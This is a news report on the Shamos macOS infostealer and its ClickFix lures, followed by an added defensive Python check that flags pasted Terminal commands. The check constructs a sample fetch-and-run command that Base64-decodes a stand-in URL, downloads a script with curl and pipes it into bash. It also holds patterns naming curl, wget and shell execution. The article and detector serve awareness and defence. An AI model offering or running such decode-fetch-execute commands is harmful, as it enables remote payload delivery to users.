New macOS Infostealer ‘Shamos’ Spreads Through ClickFix Attacks
A new infostealer malware named Shamos is targeting macOS devices through ClickFix attacks that impersonate troubleshooting guides and fixes.
The malware, a variant of the Atomic macOS Stealer (AMOS), was developed by the cybercriminal group COOKIE SPIDER and is designed to steal sensitive information, including browser credentials, Keychain items, Apple Notes, and cryptocurrency wallets.
CrowdStrike, which discovered the malware, reports attempted infections against over 300 monitored environments worldwide since June 2025.
Malvertising and Fake GitHub Repositories
Shamos is delivered through malvertising campaigns and fake GitHub repositories posing as legitimate troubleshooting resources.
[Image: Malicious GitHub repository. Source: CrowdStrike]
These lures direct victims to websites like mac-safer[.]com and rescue-mac[.]com, which provide fake instructions urging users to copy-paste shell commands into the Terminal to fix common macOS problems.
[Image: Malicious sponsored results on Google Search. Source: CrowdStrike]
Instead of solving anything, the commands:
- Decode a Base64-encoded URL
- Fetch a malicious Bash script
- Steal the user’s password
- Download and execute the Shamos Mach-O binary
[Image: False instructions for fixing printer issues on macOS. Source: CrowdStrike]
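An added example, not from CrowdStrike or the original article: a Python triage check that flags a pasted Terminal command matching the first, second and fourth steps listed above (a Base64-hidden URL, a fetch, and execution in a shell). The sample commands, the example.invalid URL and all function names are constructed for illustration.

```python
import base64
import re

# Base64 runs long enough to hide a URL, with optional padding.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
FETCHER = re.compile(r"\b(?:curl|wget)\b")
# Output piped into a shell, or a shell started with -c.
SHELL_EXEC = re.compile(r"\|\s*(?:/bin/)?(?:ba|z)?sh\b|\b(?:ba|z)?sh\s+-c\b")


def decoded_urls(command):
    """Return http(s) URLs hidden inside Base64 tokens of a command line."""
    urls = []
    for token in B64_TOKEN.findall(command):
        padded = token + "=" * (-len(token) % 4)
        try:
            text = base64.b64decode(padded, validate=True).decode("utf-8").strip()
        except (ValueError, UnicodeDecodeError):
            continue  # not Base64, or not text
        if re.match(r"https?://", text):
            urls.append(text)
    return urls


def assess(command):
    """Flag commands that decode a hidden URL, fetch it, and run the result."""
    urls = decoded_urls(command)
    fetches = bool(FETCHER.search(command))
    runs = bool(SHELL_EXEC.search(command))
    return {"decoded_urls": urls, "fetches": fetches, "runs_in_shell": runs,
            "suspicious": bool(urls) and fetches and runs}


def _b64(text):
    return base64.b64encode(text.encode()).decode()


# Constructed samples (not taken from the campaign); example.invalid never resolves.
LURE_STYLE = 'curl -fsSL "$(echo %s | base64 -d)" | bash' % _b64("https://example.invalid/fix.sh")
BENIGN_DECODE = "echo %s | base64 -d" % _b64("hello world from macOS")
BENIGN_FETCH = "curl -fsSL https://example.invalid/readme.txt -o readme.txt"

if __name__ == "__main__":
    for cmd in (LURE_STYLE, BENIGN_DECODE, BENIGN_FETCH):
        print(assess(cmd)["suspicious"], cmd)
```

The check requires all three signals together, so a plain download or a harmless Base64 decode on its own is not flagged.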